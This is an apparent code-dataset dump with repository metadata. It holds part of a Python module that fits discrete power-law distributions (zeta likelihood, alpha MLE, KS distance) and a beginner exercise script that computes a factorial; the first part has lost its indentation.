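    zeta is the Hurwitz zeta function.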
"""
if not scipyOK:
raise ImportError("Can't import scipy. Need scipy for zeta function.")
from scipy.special import zeta as zeta
zz = data[data>=xmin]
nn = len(zz)
sum_log_data = numpy.log(zz).sum()
zeta = zeta(alpha, xmin)
L_of_alpha = -1*nn*log(zeta) - alpha * sum_log_data
return L_of_alpha
def discrete_likelihood_vector(data, xmin, alpharange=(1.5,3.5), n_alpha=201):
"""
Compute the likelihood for all "scaling parameters" in the range (alpharange)
for a given xmin. This is only part of the discrete value likelihood
maximization problem as described in Clauset et al
(Equation B.8)
*alpharange* [ 2-tuple ]
Two floats specifying the upper and lower limits of the power law alpha to test
"""
from scipy.special import zeta as zeta
zz = data[data>=xmin]
nn = len(zz)
alpha_vector = numpy.linspace(alpharange[0],alpharange[1],n_alpha)
sum_log_data = numpy.log(zz).sum()
# alpha_vector is a vector, xmin is a scalar
zeta_vector = zeta(alpha_vector, xmin)
#xminvec = numpy.arange(1.0,xmin)
#xminalphasum = numpy.sum([xm**(-alpha_vector) for xm in xminvec])
#L = -1*alpha_vector*sum_log_data - nn*log(zeta_vector) - xminalphasum
L_of_alpha = -1*nn*log(zeta_vector) - alpha_vector * sum_log_data
return L_of_alpha
def discrete_max_likelihood_arg(data, xmin, alpharange=(1.5,3.5), n_alpha=201):
"""
Returns the *argument* of the max of the likelihood of the data given an input xmin
"""
likelihoods = discrete_likelihood_vector(data, xmin, alpharange=alpharange, n_alpha=n_alpha)
Largmax = numpy.argmax(likelihoods)
return Largmax
def discrete_max_likelihood(data, xmin, alpharange=(1.5,3.5), n_alpha=201):
"""
Returns the *argument* of the max of the likelihood of the data given an input xmin
"""
likelihoods = discrete_likelihood_vector(data, xmin, alpharange=alpharange, n_alpha=n_alpha)
Lmax = numpy.max(likelihoods)
return Lmax
def most_likely_alpha(data, xmin, alpharange=(1.5,3.5), n_alpha=201):
"""
Return the most likely alpha for the data given an xmin
"""
alpha_vector = numpy.linspace(alpharange[0],alpharange[1],n_alpha)
return alpha_vector[discrete_max_likelihood_arg(data, xmin, alpharange=alpharange, n_alpha=n_alpha)]
def discrete_alpha_mle(data, xmin):
"""
Equation B.17 of Clauset et al 2009
The Maximum Likelihood Estimator of the "scaling parameter" alpha in the
discrete case is similar to that in the continuous case
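    The approximate estimator used below is
        alpha_hat = 1 + n * [ sum_i ln( x_i / (xmin - 0.5) ) ]**-1
    with the count n and the sum taken over the points x_i >= xmin.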
"""
# boolean indices of positive data
gexmin = (data>=xmin)
nn = gexmin.sum()
if nn < 2:
return 0
xx = data[gexmin]
alpha = 1.0 + float(nn) * ( sum(log(xx/(xmin-0.5))) )**-1
return alpha
def discrete_best_alpha(data, alpharangemults=(0.9,1.1), n_alpha=201, approximate=True, verbose=True):
"""
Use the maximum L to determine the most likely value of alpha
*alpharangemults* [ 2-tuple ]
Pair of values indicating multiplicative factors above and below the
approximate alpha from the MLE alpha to use when determining the
"exact" alpha (by directly maximizing the likelihood function)
"""
xmins = numpy.unique(data)
if approximate:
alpha_of_xmin = [ discrete_alpha_mle(data,xmin) for xmin in xmins ]
else:
alpha_approx = [ discrete_alpha_mle(data,xmin) for xmin in xmins ]
alpharanges = [(0.9*a,1.1*a) for a in alpha_approx]
alpha_of_xmin = [ most_likely_alpha(data,xmin,alpharange=ar,n_alpha=n_alpha) for xmin,ar in zip(xmins,alpharanges) ]
ksvalues = [ discrete_ksD(data, xmin, alpha) for xmin,alpha in zip(xmins,alpha_of_xmin) ]
best_index = argmin(ksvalues)
best_alpha = alpha_of_xmin[best_index]
best_xmin = xmins[best_index]
best_ks = ksvalues[best_index]
best_likelihood = discrete_likelihood(data, best_xmin, best_alpha)
if verbose:
print "alpha = %f xmin = %f ksD = %f L = %f (n<x) = %i (n>=x) = %i" % (
best_alpha, best_xmin, best_ks, best_likelihood,
(data<best_xmin).sum(), (data>=best_xmin).sum())
return best_alpha,best_xmin,best_ks,best_likelihood
def discrete_ksD(data, xmin, alpha):
"""
given a sorted data set, a minimum, and an alpha, returns the power law ks-test
D value w/data
The returned value is the "D" parameter in the ks test
(this is implemented differently from the continuous version because there
are potentially multiple identical points that need comparison to the power
law)
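    Concretely, D = max | S(x) - P(x) |, where P(x) = 1 - (x/xmin)**(1-alpha) is the
    model CDF and S(x) is the empirical CDF of the points with x >= xmin.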
"""
zz = numpy.sort(data[data>=xmin])
nn = float(len(zz))
if nn < 2: return numpy.inf
#cx = numpy.arange(nn,dtype='float')/float(nn)
#cf = 1.0-(zz/xmin)**(1.0-alpha)
model_cdf = 1.0-(zz/xmin)**(1.0-alpha)
data_cdf = numpy.searchsorted(zz,zz,side='left')/(float(nn))
ks = max(abs(model_cdf-data_cdf))
return ks
| [
"[email protected]"
] | |
a80d9b938594db48e8dd0d649481f0021e23eaa1 | 7d8332bbe03ec8c896f6ead97fa3b29a06e9b14f | /Q002.py | 7a786079b8bca93cdc6399d9cc94b0a2b210eb0e | [] | no_license | geomotion-luka/python-exercises | ea96f050ce4dd811ded973d147d4423678588420 | 79d3abced3492e263a8a9ad0003ce0b2503a40dd | refs/heads/master | 2020-04-08T18:16:39.221184 | 2018-12-11T08:25:01 | 2018-12-11T08:25:01 | 159,600,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | #----------------------------------------#
# Question 2
# Level 1
#
# Question:
# Write a program which can compute the factorial of a given number.
# The results should be printed in a comma-separated sequence on a single line.
# Suppose the following input is supplied to the program:
# 8
# Then, the output should be:
# 40320
def factorial(number):
    # multiply number * (number - 1) * ... * 1; the empty product gives 0! == 1
    result = 1
    for i in range(number, 0, -1):
        result *= i
    print(result)
number = input()
factorial(int(number))
| [
"[email protected]"
] |